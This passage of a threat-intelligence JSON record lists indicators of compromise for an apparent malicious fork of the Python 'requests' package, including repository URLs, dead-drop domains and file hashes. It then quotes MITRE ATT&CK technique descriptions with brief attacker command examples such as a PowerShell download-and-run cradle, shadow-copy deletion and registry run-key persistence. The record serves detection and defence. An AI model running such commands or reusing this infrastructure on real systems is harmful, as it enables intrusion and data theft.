5.44, "events": 5.44, "total": 1000000}, {"iso_code": "IE", "affected": 37.98, "events": 37.98, "total": 1000000}, {"iso_code": "KZ", "affected": 96.04, "events": 96.04, "total": 1000000}, {"iso_code": "PL", "affected": 9.05, "events": 9.05, "total": 1000000}, {"iso_code": "GB", "affected": 2.88, "events": 2.88, "total": 1000000}], "events": 30.84, "nodes": 15.62, "sectors": [{"sector": "Unknown", "affected": 131.32, "events": 259.36, "total": 1000000}], "countriesTotalDevices": 1000000}, "iocs": [{"type": "domain", "value": "graph.org"}, {"type": "domain", "value": "abacus.jasoncameron.dev"}, {"type": "url", "value": "https://github.com/pypls/requests.git"}, {"type": "url", "value": "https://github.com/pypls/requests"}, {"type": "url", "value": "https://graph.org/coding-utf-8-09-05-2"}, {"type": "url", "value": "https://abacus.jasoncameron.dev/hit/duff.com/info"}, {"type": "url", "value": "https://api.github.com/users/pypls"}, {"type": "url", "value": "https://api.github.com/repos/pypls/requests"}, {"type": "url", "value": "https://github.com/hacksider/Deep-Live-Cam/commit/7895c547a6788ee53e5c7c34e93454f86f6d2b53"}, {"type": "url", "value": "https://github.com/hacksider/Deep-Live-Cam/commit/55d306d5ae07a4e6494013422ab244306a5c0879"}, {"type": "url", "value": "https://github.com/hacksider/Deep-Live-Cam/issues/1930"}, {"type": "url", "value": "https://api.github.com/repos/hacksider/Deep-Live-Cam/events"}, {"type": "email", "value": "oakleyiballard1984@proton.me"}, {"type": "sha256", "value": "b34818f9208133c2fd2d0814162c6f3c59e35df518e3c95f998890f7e4a5e6f4"}, {"type": "sha256", "value": "f6fbefc82589dbeddabc8883c63cbb027239019ed38fafa83a9139c2585064f5"}, {"type": "sha256", "value": "175f9e7fad2661f647c8f2438bf0d757fe18ab364a22c544c938f45e0e4f6ced"}, {"type": "sha256", "value": "eafed30038d53614cf3dc7a8f19c2dd663352b3c8cb78aa5ed1b9d9710017570"}, {"type": "sha256", "value": "c91a00b56ad2591236ccefd701a6b19b72dbacefadbdb0f11e13693c2d6764d9"}, {"type": "sha256", "value": "73cb3c0e9afd9db32a392655ff58be5cc95b24fbc0f412202853dc0161dd0561"}], "galaxies": [{"id": "a9574290-6f7e-11ea-8942-06365ef617e6", "category": "mitre-attack-pattern", "description": "Adversaries may collect data stored in the clipboard from users copying information within or between applications. \n\nFor example, on Windows adversaries can access clipboard data by using <code>clip.exe</code> or <code>Get-Clipboard</code>.(Citation: MSDN Clipboard)(Citation: clip_win_server)(Citation: CISA_AA21_200B) Additionally, adversaries may monitor then replace users\u2019 clipboard with their data (e.g., [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002)).(Citation: mining_ruby_reversinglabs)\n\nmacOS and Linux also have commands, such as <code>pbpaste</code>, to grab clipboard contents.(Citation: Operating with EmPyre)", "created_on": "2020-03-26T16:27:18.000Z", "name": "Clipboard Data"}, {"id": "6b646d82-f30c-4494-8f19-f7f70c689d6f", "category": "mitre-attack-pattern", "description": "Adversaries may obfuscate content during command execution to impede detection. Command-line obfuscation is a method of making strings and patterns within commands and scripts more difficult to signature and analyze. This type of obfuscation can be included within commands executed by delivered payloads (e.g., [Phishing](https://attack.mitre.org/techniques/T1566) and [Drive-by Compromise](https://attack.mitre.org/techniques/T1189)) or interactively via [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059).(Citation: Akamai JS)(Citation: Malware Monday VBE)\n\nFor example, adversaries may abuse syntax that utilizes various symbols and escape characters (such as spacing,  `^`, `+`. `$`, and `%`) to make commands difficult to analyze while maintaining the same intended functionality.(Citation: RC PowerShell) Many languages support built-in obfuscation in the form of base64 or URL encoding.(Citation: Microsoft PowerShellB64) Adversaries may also manually implement command obfuscation via string splitting (`\u201cWor\u201d+\u201cd.Application\u201d`), order and casing of characters (`rev <<<'dwssap/cte/ tac'`), globing (`mkdir -p '/tmp/:&$NiA'`), as well as various tricks involving passing strings through tokens/environment variables/input streams.(Citation: Bashfuscator Command Obfuscators)(Citation: FireEye Obfuscation June 2017)\n\nAdversaries may also use tricks such as directory traversals to obfuscate references to the binary being invoked by a command (`C:\\voi\\pcw\\..\\..\\Windows\\tei\\qs\\k\\..\\..\\..\\system32\\erool\\..\\wbem\\wg\\je\\..\\..\\wmic.exe shadowcopy delete`).(Citation: Twitter Richard WMIC)\n\nTools such as <code>Invoke-Obfuscation</code> and <code>Invoke-DOSfucation</code> have also been used to obfuscate commands.(Citation: Invoke-DOSfuscation)(Citation: Invoke-Obfuscation)", "created_on": "2023-06-12T21:12:23.000Z", "name": "Command Obfuscation"}, {"id": "3745af7a-4135-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may manipulate software dependencies and development tools prior to receipt by a final consumer for the purpose of data or system compromise. Applications often depend on external software to function properly. Popular open source projects that are used as dependencies in many applications, such as pip and NPM packages, may be targeted as a means to add malicious code to users of the dependency.(Citation: Trendmicro NPM Compromise)(Citation: Bitdefender NPM Repositories Compromised 2021)(Citation: MANDVI Malicious npm and PyPI Packages Disguised) This may also include abandoned packages, which in some cases could be re-registered by threat actors after being removed by adversaries.(Citation: The Hacker News PyPi Revival Hijack 2024) Adversaries may also employ \"typosquatting\" or name-confusion by choosing names similar to existing popular libraries or packages in order to deceive a user.(Citation: Ahmed Backdoors in Python and NPM Packages)(Citation: Meyer PyPI Supply Chain Attack Uncovered)(Citation: Checkmarx-oss-seo)\n\nAdditionally, CI/CD pipeline components, such as GitHub Actions, may be targeted in order to gain access to the building, testing, and deployment cycles of an application.(Citation: Unit 42 Palo Alto GitHub Actions Supply Chain Attack 2025) By adding malicious code into a GitHub action, a threat actor may be able to collect runtime credentials (e.g., via [Proc Filesystem](https://attack.mitre.org/techniques/T1003/007)) or insert further malicious components into the build pipelines for a second-order supply chain compromise.(Citation: OWASP CICD-SEC-4) As GitHub Actions are often dependent on other GitHub Actions, threat actors may be able to infect a large number of repositories via the compromise of a single Action.(Citation: Palo Alto Networks GitHub Actions Worm 2023)\n\nTargeting may be specific to a desired victim set or may be distributed to a broad set of consumers but only move on to additional tactics on specific victims. ", "created_on": "2020-12-18T13:30:38.000Z", "name": "Compromise Software Dependencies and Development Tools"}, {"id": "e49e1bf6-604b-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may use an existing, legitimate external Web service to host information that points to additional command and control (C2) infrastructure. Adversaries may post content, known as a dead drop resolver, on Web services with embedded (and often obfuscated/encoded) domains or IP addresses. Once infected, victims will reach out to and be redirected by these resolvers.\n\nPopular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.\n\nUse of a dead drop resolver may also protect back-end C2 infrastructure from discovery through malware binary analysis while also enabling operational resiliency (since this infrastructure may be dynamically changed).", "created_on": "2021-01-27T03:01:03.000Z", "name": "Dead Drop Resolver"}, {"id": "c3dcf574-589e-11ea-8942-06365ef617e6", "category": "mitre-attack-pattern", "description": "Adversaries may use [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027) to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.\n\nOne such example is the use of [certutil](https://attack.mitre.org/software/S0160) to decode a remote access tool portable executable file that has been hidden inside a certificate file.(Citation: Malwarebytes Targeted Attack against Saudi Arabia) Another example is using the Windows <code>copy /b</code> or <code>type</code> command to reassemble binary fragments into a malicious payload.(Citation: Carbon Black Obfuscation Sept 2016)(Citation: Sentinel One Tainted Love 2023)\n\nSometimes a user's action may be required to open it for deobfuscation or decryption as part of [User Execution](https://attack.mitre.org/techniques/T1204). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary.(Citation: Volexity PowerDuke November 2016)", "created_on": "2020-02-26T13:49:10.000Z", "name": "Deobfuscate/Decode Files or Information"}, {"id": "aeddd759-fd26-4ad5-9a59-356196e62972", "category": "mitre-attack-pattern", "description": "Adversaries may encrypt or encode files to obfuscate strings, bytes, and other specific patterns to impede detection. Encrypting and/or encoding file content aims to conceal malicious artifacts within a file used in an intrusion. Many other techniques, such as [Software Packing](https://attack.mitre.org/techniques/T1027/002), [Steganography](https://attack.mitre.org/techniques/T1027/003), and [Embedded Payloads](https://attack.mitre.org/techniques/T1027/009), share this same broad objective. Encrypting and/or encoding files could lead to a lapse in detection of static signatures, only for this malicious content to be revealed (i.e., [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140)) at the time of execution/use.\n\nThis type of file obfuscation can be applied to many file artifacts present on victim hosts, such as malware log/configuration and payload files.(Citation: File obfuscation) Files can be encrypted with a hardcoded or user-supplied key, as well as otherwise obfuscated using standard encoding schemes such as Base64.\n\nThe entire content of a file may be obfuscated, or just specific functions or values (such as C2 addresses). Encryption and encoding may also be applied in redundant layers for additional protection.\n\nFor example, adversaries may abuse password-protected Word documents or self-extracting (SFX) archives as a method of encrypting/encoding a file such as a [Phishing](https://attack.mitre.org/techniques/T1566) payload. These files typically function by attaching the intended archived content to a decompressor stub that is executed when the file is invoked (e.g., [User Execution](https://attack.mitre.org/techniques/T1204)).(Citation: SFX - Encrypted/Encoded File) \n\nAdversaries may also abuse file-specific as well as custom encoding schemes. For example, Byte Order Mark (BOM) headers in text files may be abused to manipulate and obfuscate file content until [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) execution.", "created_on": "2024-05-23T21:13:59.000Z", "name": "Encrypted/Encoded File"}, {"id": "1115ac9f-8ecb-4266-9289-de0607ac2ddd", "category": "mitre-attack-pattern", "description": "Adversaries may store data in \"fileless\" formats to conceal malicious activity from defenses. Fileless storage can be broadly defined as any format other than a file. Common examples of non-volatile fileless storage in Windows systems include the Windows Registry, event logs, or WMI repository.(Citation: Microsoft Fileless)(Citation: SecureList Fileless) Shared memory directories on Linux systems (`/dev/shm`, `/run/shm`, `/var/run`, and `/var/lock`) and volatile directories on Network Devices (`/tmp` and `/volatile`) may also be considered fileless storage, as files written to these directories are mapped directly to RAM and not stored on the disk.(Citation: Elastic Binary Executed from Shared Memory Directory)(Citation: Akami Frog4Shell 2024)(Citation: Aquasec Muhstik Malware 2024)(Citation: Bitsight 7777 Botnet)(Citation: CISCO Nexus 900 Config).\n\nSimilar to fileless in-memory behaviors such as [Reflective Code Loading](https://attack.mitre.org/techniques/T1620) and [Process Injection](https://attack.mitre.org/techniques/T1055), fileless data storage may remain undetected by anti-virus and other endpoint security tools that can only access specific file formats from disk storage. Leveraging fileless storage may also allow adversaries to bypass the protections offered by read-only file systems in Linux.(Citation: Sysdig Fileless Malware 23022)\n\nAdversaries may use fileless storage to conceal various types of stored data, including payloads/shellcode (potentially being used as part of [Persistence](https://attack.mitre.org/tactics/TA0003)) and collected data not yet exfiltrated from the victim (e.g., [Local Data Staging](https://attack.mitre.org/techniques/T1074/001)). Adversaries also often encrypt, encode, splice, or otherwise obfuscate this fileless data when stored. \n\nSome forms of fileless storage activity may indirectly create artifacts in the file system, but in central and otherwise difficult to inspect formats such as the WMI (e.g., `%SystemRoot%\\System32\\Wbem\\Repository`) or Registry (e.g., `%SystemRoot%\\System32\\Config`) physical files.(Citation: Microsoft Fileless) ", "created_on": "2023-06-12T21:12:23.000Z", "name": "Fileless Storage"}, {"id": "389ff6b7-0976-4d8b-bcdf-eb6997519b48", "category": "mitre-attack-pattern", "description": "Adversaries may steal monetary resources from targets through extortion, social engineering, technical theft, or other methods aimed at their own financial gain at the expense of the availability of these resources for victims. Financial theft is the ultimate objective of several popular campaign types including extortion by ransomware,(Citation: FBI-ransomware) business email compromise (BEC) and fraud,(Citation: FBI-BEC) \"pig butchering,\"(Citation: wired-pig butchering) bank hacking,(Citation: DOJ-DPRK Heist) and exploiting cryptocurrency networks.(Citation: BBC-Ronin) \n\nAdversaries may [Compromise Accounts](https://attack.mitre.org/techniques/T1586) to conduct unauthorized transfers of funds.(Citation: Internet crime report 2022) In the case of business email compromise or email fraud, an adversary may utilize [Impersonation](https://attack.mitre.org/techniques/T1656) of a trusted entity. Once the social engineering is successful, victims can be deceived into sending money to financial accounts controlled by an adversary.(Citation: FBI-BEC) This creates the potential for multiple victims (i.e., compromised accounts as well as the ultimate monetary loss) in incidents involving financial theft.(Citation: VEC)\n\nExtortion by ransomware may occur, for example, when an adversary demands payment from a victim after [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486) (Citation: NYT-Colonial) and [Exfiltration](https://attack.mitre.org/tactics/TA0010) of data, followed by threatening to leak sensitive data to the public unless payment is made to the adversary.(Citation: Mandiant-leaks) Adversaries may use dedicated leak sites to distribute victim data.(Citation: Crowdstrike-leaks)\n\nDue to the potentially immense business impact of financial theft, an adversary may abuse the possibility of financial theft and seeking monetary gain to divert attention from their true goals such as [Data Destruction](https://attack.mitre.org/techniques/T1485) and business disruption.(Citation: AP-NotPetya)", "created_on": "2024-02-08T22:14:05.000Z", "name": "Financial Theft"}, {"id": "a8ab0689-973a-427d-92cc-90bc1fc8118f", "category": "trellix-tool", "description": "GitHub is a web-based platform used for version control and collaboration on software development projects. It provides tools for developers to host and review code, manage projects, track changes, and collaborate with other team members or contributors. GitHub uses Git, a distributed version control system, allowing developers to track changes made to code over time, revert to previous versions if needed, and work on code collaboratively with others. It is widely used by individuals, open-source projects, and businesses to streamline software development processes and facilitate collaboration among developers worldwide.", "created_on": "2024-04-03T21:15:07.000Z", "name": "GitHub"}, {"id": "bc9362b6-39ca-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may use hidden windows to conceal malicious activity from the plain sight of users. In some cases, windows that would typically be displayed when an application carries out an operation can be hidden. This may be utilized by system administrators to avoid disrupting user work environments when carrying out administrative tasks. \n\nAdversaries may abuse these functionalities to hide otherwise visible windows from users so as not to alert the user to adversary activity on the system.(Citation: Antiquated Mac Malware)\n\nOn macOS, the configurations for how applications run are listed in property list (plist) files. One of the tags in these files can be <code>apple.awt.UIElement</code>, which allows for Java applications to prevent the application's icon from appearing in the Dock. A common use for this is when applications run in the system tray, but don't also want to show up in the Dock.\n\nSimilarly, on Windows there are a variety of features in scripting languages, such as [PowerShell](https://attack.mitre.org/techniques/T1059/001), Jscript, and [Visual Basic](https://attack.mitre.org/techniques/T1059/005) to make windows hidden. One example of this is <code>powershell.exe -WindowStyle Hidden</code>.(Citation: PowerShell About 2019)\n\nThe Windows Registry can also be edited to hide application windows from the current user. For example, by setting the `WindowPosition` subkey in the `HKEY_CURRENT_USER\\Console\\%SystemRoot%_System32_WindowsPowerShell_v1.0_PowerShell.exe` Registry key to a maximum value, PowerShell windows will open off screen and be hidden.(Citation: Cantoris Computing)\n\nIn addition, Windows supports the `CreateDesktop()` API that can create a hidden desktop window with its own corresponding <code>explorer.exe</code> process.(Citation: Hidden VNC)(Citation: Anatomy of an hVNC Attack)  All applications running on the hidden desktop window, such as a hidden VNC (hVNC) session,(Citation: Hidden VNC) will be invisible to other desktops windows.\n\nAdversaries may also leverage cmd.exe(Citation: Cybereason - Hidden Malicious Remote Access) as a parent process, and then utilize a LOLBin, such as DeviceCredentialDeployment.exe,(Citation: LOLBAS Project GitHub Device Cred Dep)(Citation: SecureList BlueNoroff Device Cred Dev) to hide windows.", "created_on": "2020-12-09T03:00:47.000Z", "name": "Hidden Window"}, {"id": "c4685e8c-589e-11ea-8942-06365ef617e6", "category": "mitre-attack-pattern", "description": "Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as [ftp](https://attack.mitre.org/software/S0095). Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570)). \n\nOn Windows, adversaries may use various utilities to download tools, such as `copy`, `finger`, [certutil](https://attack.mitre.org/software/S0160), and [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands such as <code>IEX(New-Object Net.WebClient).downloadString()</code> and <code>Invoke-WebRequest</code>. On Linux and macOS systems, a variety of utilities also exist, such as `curl`, `scp`, `sftp`, `tftp`, `rsync`, `finger`, and `wget`.(Citation: t1105_lolbas)  A number of these tools, such as `wget`, `curl`, and `scp`, also exist on ESXi. After downloading a file, a threat actor may attempt to verify its integrity by checking its hash value (e.g., via `certutil -hashfile`).(Citation: Google Cloud Threat Intelligence COSCMICENERGY 2023)\n\nAdversaries may also abuse installers and package managers, such as `yum` or `winget`, to download tools to victim hosts. Adversaries have also abused file application features, such as the Windows `search-ms` protocol handler, to deliver malicious files to victims through remote file searches invoked by [User Execution](https://attack.mitre.org/techniques/T1204) (typically after interacting with [Phishing](https://attack.mitre.org/techniques/T1566) lures).(Citation: T1105: Trellix_search-ms)\n\nFiles can also be transferred using various [Web Service](https://attack.mitre.org/techniques/T1102)s as well as native or otherwise present tools on the victim system.(Citation: PTSecurity Cobalt Dec 2016) In some cases, adversaries may be able to leverage services that sync between a web-based and an on-premises client, such as Dropbox or OneDrive, to transfer files onto victim systems. For example, by compromising a cloud account and logging into the service's web portal, an adversary may be able to trigger an automatic syncing process that transfers the file onto the victim's machine.(Citation: Dropbox Malware Sync)", "created_on": "2020-02-26T13:49:11.000Z", "name": "Ingress Tool Transfer"}, {"id": "453a0735-6916-11ea-8942-06365ef617e6", "category": "sector", "description": "", "created_on": "2020-03-18T12:44:55.000Z", "name": "IT"}, {"id": "3a943771-3683-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may create or modify launch agents to repeatedly execute malicious payloads as part of persistence. When a user logs in, a per-user launchd process is started which loads the parameters for each launch-on-demand user agent from the property list (.plist) file found in <code>/System/Library/LaunchAgents</code>, <code>/Library/LaunchAgents</code>, and <code>~/Library/LaunchAgents</code>.(Citation: AppleDocs Launch Agent Daemons)(Citation: OSX Keydnap malware) (Citation: Antiquated Mac Malware) Property list files use the <code>Label</code>, <code>ProgramArguments </code>, and <code>RunAtLoad</code> keys to identify the Launch Agent's name, executable location, and execution time.(Citation: OSX.Dok Malware) Launch Agents are often installed to perform updates to programs, launch user specified programs at login, or to conduct other developer tasks.\n\n Launch Agents can also be executed using the [Launchctl](https://attack.mitre.org/techniques/T1569/001) command.\n \nAdversaries may install a new Launch Agent that executes at login by placing a .plist file into the appropriate folders with the <code>RunAtLoad</code> or <code>KeepAlive</code> keys set to <code>true</code>.(Citation: Sofacy Komplex Trojan)(Citation: Methods of Mac Malware Persistence) The Launch Agent name may be disguised by using a name from the related operating system or benign software. Launch Agents are created with user level privileges and execute with user level permissions.(Citation: OSX Malware Detection)(Citation: OceanLotus for OS X) ", "created_on": "2020-12-04T22:51:21.000Z", "name": "Launch Agent"}, {"id": "294bbdf8-4134-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may match or approximate the name or location of legitimate files or resources when naming/placing them. This is done for the sake of evading defenses and observation. This may be done by placing an executable in a commonly trusted directory (ex: under System32) or giving it the name of a legitimate, trusted program (ex: svchost.exe). In containerized environments, this may also be done by creating a resource in a namespace that matches the naming convention of a container pod or cluster. Alternatively, a file or container image name given may be a close approximation to legitimate programs/images or something innocuous.\n\nAdversaries may also use the same icon of the file they are trying to mimic.", "created_on": "2020-12-18T13:23:05.000Z", "name": "Match Legitimate Name or Location"}, {"id": "c3774e67-589e-11ea-8942-06365ef617e6", "category": "mitre-attack-pattern", "description": "Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.(Citation: NT API Windows)(Citation: Linux Kernel API) These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.\n\nAdversaries may abuse these OS API functions as a means of executing behaviors. Similar to [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), the native API and its hierarchy of interfaces provide mechanisms to interact with and utilize various components of a victimized system.\n\nNative API functions (such as <code>NtCreateProcess</code>) may be directed invoked via system calls / syscalls, but these features are also often exposed to user-mode applications via interfaces and libraries.(Citation: OutFlank System Calls)(Citation: CyberBit System Calls)(Citation: MDSec System Calls) For example, functions such as the Windows API <code>CreateProcess()</code> or GNU <code>fork()</code> will allow programs and scripts to start other processes.(Citation: Microsoft CreateProcess)(Citation: GNU Fork) This may allow API callers to execute a binary, run a CLI command, load modules, etc. as thousands of similar API functions exist for various system operations.(Citation: Microsoft Win32)(Citation: LIBC)(Citation: GLIBC)\n\nHigher level software frameworks, such as Microsoft .NET and macOS Cocoa, are also available to interact with native APIs. These frameworks typically provide language wrappers/abstractions to API functionalities and are designed for ease-of-use/portability of code.(Citation: Microsoft NET)(Citation: Apple Core Services)(Citation: MACOS Cocoa)(Citation: macOS Foundation)\n\nAdversaries may use assembly to directly or in-directly invoke syscalls in an attempt to subvert defensive sensors and detection signatures such as user mode API-hooks.(Citation: Redops Syscalls) Adversaries may also attempt to tamper with sensors and defensive tools associated with API monitoring, such as unhooking monitored functions via [Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001).", "created_on": "2020-02-26T13:49:09.000Z", "name": "Native API"}, {"id": "b8f68601-73a1-4f5b-9c4d-475fa88c5b72", "category": "trellix-tool", "description": "The pbcopy command is a built-in utility for the macOS terminal that allows you to copy text directly to your system clipboard from the command line. Instead of manually selecting and copying text with a mouse or keyboard shortcut, you can pipe or redirect the output of any command into pbcopy to save it. Once the text is sent to the clipboard via this tool, it becomes immediately available to paste into any other application on your computer using the standard paste function.", "created_on": "2026-06-02T00:15:20.000Z", "name": "pbcopy"}, {"id": "65ceaa54-326f-420c-8d1a-08bc7cdd8c8d", "category": "trellix-tool", "description": "The command pbpaste is a command-line utility found on macOS that allows you to output the contents of the system clipboard. Whatever text or data you have last copied, whether from a graphical application or another terminal command like pbcopy, will be printed to the standard output when you run pbpaste. This makes it a useful tool for scripting and command-line workflows, as you can redirect the pasted content into a file or pipe it to another command for further processing. Essentially, it serves as the command-line equivalent of the paste action.", "created_on": "2025-10-17T16:15:34.000Z", "name": "pbpaste"}, {"id": "7079516d-ad7b-11ea-9477-02d538d9640e", "category": "sector", "description": "", "created_on": "2020-06-13T13:40:26.000Z", "name": "Programming"}, {"id": "d660cca8-5bf7-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may abuse Python commands and scripts for execution. Python is a very popular scripting/programming language, with capabilities to perform many functions. Python can be executed interactively from the command-line (via the <code>python.exe</code> interpreter) or via scripts (.py) that can be written and distributed to different systems. Python code can also be compiled into binary executables.(Citation: Zscaler APT31 Covid-19 October 2020)\n\nPython comes with many built-in packages to interact with the underlying system, such as file operations and device I/O. Adversaries can use these libraries to download and execute commands or other scripts as well as perform various malicious behaviors.", "created_on": "2021-01-21T14:49:17.000Z", "name": "Python"}, {"id": "a2faebc4-c394-48e6-8748-470c721b5a91", "category": "trellix-tool", "description": "The genuine python.exe file is an essential software component developed by the Python Software Foundation that functions as the primary executable used to launch Python applications. As an adaptable, high-level programming language, Python accommodates multiple coding paradigms, including object-oriented, imperative, functional, and procedural programming styles.", "created_on": "2022-08-05T21:14:35.000Z", "name": "python.exe"}, {"id": "34fe6633-ca2c-484d-a48f-b72758387194", "category": "mitre-attack-pattern", "description": "Adversaries may reflectively load code into a process in order to conceal the execution of malicious payloads. Reflective loading involves allocating then executing payloads directly within the memory of the process, vice creating a thread or process backed by a file path on disk (e.g., [Shared Modules](https://attack.mitre.org/techniques/T1129)).\n\nReflectively loaded payloads may be compiled binaries, anonymous files (only present in RAM), or just snubs of fileless executable code (ex: position-independent shellcode).(Citation: Introducing Donut)(Citation: S1 Custom Shellcode Tool)(Citation: Stuart ELF Memory)(Citation: 00sec Droppers)(Citation: Mandiant BYOL) For example, the `Assembly.Load()` method executed by [PowerShell](https://attack.mitre.org/techniques/T1059/001) may be abused to load raw code into the running process.(Citation: Microsoft AssemblyLoad)\n\nReflective code injection is very similar to [Process Injection](https://attack.mitre.org/techniques/T1055) except that the \u201cinjection\u201d loads code into the processes\u2019 own memory instead of that of a separate process. Reflective loading may evade process-based detections since the execution of the arbitrary code may be masked within a legitimate or otherwise benign process. Reflectively loading payloads directly into memory may also avoid creating files or other artifacts on disk, while also enabling malware to keep these payloads encrypted (or otherwise obfuscated) until execution.(Citation: Stuart ELF Memory)(Citation: 00sec Droppers)(Citation: Intezer ACBackdoor)(Citation: S1 Old Rat New Tricks)", "created_on": "2021-12-07T06:14:11.000Z", "name": "Reflective Code Loading"}, {"id": "9cc8ce6a-2adc-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the \"run keys\" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.(Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level.\n\nThe following run keys are created by default on Windows systems:\n\n* <code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run</code>\n* <code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce</code>\n* <code>HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run</code>\n* <code>HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce</code>\n\nRun keys may exist under multiple hives.(Citation: Microsoft Wow6432Node 2018)(Citation: Malwarebytes Wow6432Node 2016) The <code>HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx</code> is also available but is not created by default on Windows Vista and newer. Registry run key entries can reference programs directly or list them as a dependency.(Citation: Microsoft Run Key) For example, it is possible to load a DLL at logon using a \"Depend\" key with RunOnceEx: <code>reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend /v 1 /d \"C:\\temp\\evil[.]dll\"</code> (Citation: Oddvar Moe RunOnceEx Mar 2018)\n\nPlacing a program within a startup folder will also cause that program to execute when a user logs in. There is a startup folder location for individual user accounts as well as a system-wide startup folder that will be checked regardless of which user account logs in. The startup folder path for the current user is <code>C:\\Users\\\\[Username]\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup</code>. The startup folder path for all users is <code>C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp</code>.\n\nThe following Registry keys can be used to set startup folder items for persistence:\n\n* <code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders</code>\n* <code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders</code>\n* <code>HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders</code>\n* <code>HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders</code>\n\nThe following Registry keys can control automatic startup of services during boot:\n\n* <code>HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce</code>\n* <code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce</code>\n* <code>HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices</code>\n* <code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices</code>\n\nUsing policy settings to specify startup programs creates corresponding values in either of two Registry keys:\n\n* <code>HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run</code>\n* <code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run</code>\n\nPrograms listed in the load value of the registry key <code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows</code> run automatically for the currently logged-on user.\n\nBy default, the multistring <code>BootExecute</code> value of the registry key <code>HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Session Manager</code> is set to <code>autocheck autochk *</code>. This value causes Windows, at startup, to check the file-system integrity of the hard disks if the system has been shut down abnormally. Adversaries can add other programs or processes to this registry value which will automatically launch at boot.\n\nAdversaries can use these configuration locations to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use [Masquerading](https://attack.mitre.org/techniques/T1036) to make the Registry entries look as if they are associated with legitimate programs.", "created_on": "2020-11-20T03:00:57.000Z", "name": "Registry Run Keys / Startup Folder"}, {"id": "c3f17bf6-589e-11ea-8942-06365ef617e6", "category": "mitre-attack-pattern", "description": "An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use this information to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. This behavior is distinct from [Local Storage Discovery](https://attack.mitre.org/techniques/T1680) which is an adversary's discovery of local drive, disks and/or volumes.\n\nTools such as [Systeminfo](https://attack.mitre.org/software/S0096) can be used to gather detailed system information. If running with privileged access, a breakdown of system data can be gathered through the <code>systemsetup</code> configuration tool on macOS. Adversaries may leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to gather detailed system information (e.g. <code>show version</code>).(Citation: US-CERT-TA18-106A) On ESXi servers, threat actors may gather system information from various esxcli utilities, such as `system hostname get` and `system version get`.(Citation: Crowdstrike Hypervisor Jackpotting Pt 2 2021)(Citation: Varonis)\n\nInfrastructure as a Service (IaaS) cloud providers such as AWS, GCP, and Azure allow access to instance and virtual machine information via APIs. Successful authenticated API calls can return data such as the operating system platform and status of a particular instance or the model view of a virtual machine.(Citation: Amazon Describe Instance)(Citation: Google Instances Resource)(Citation: 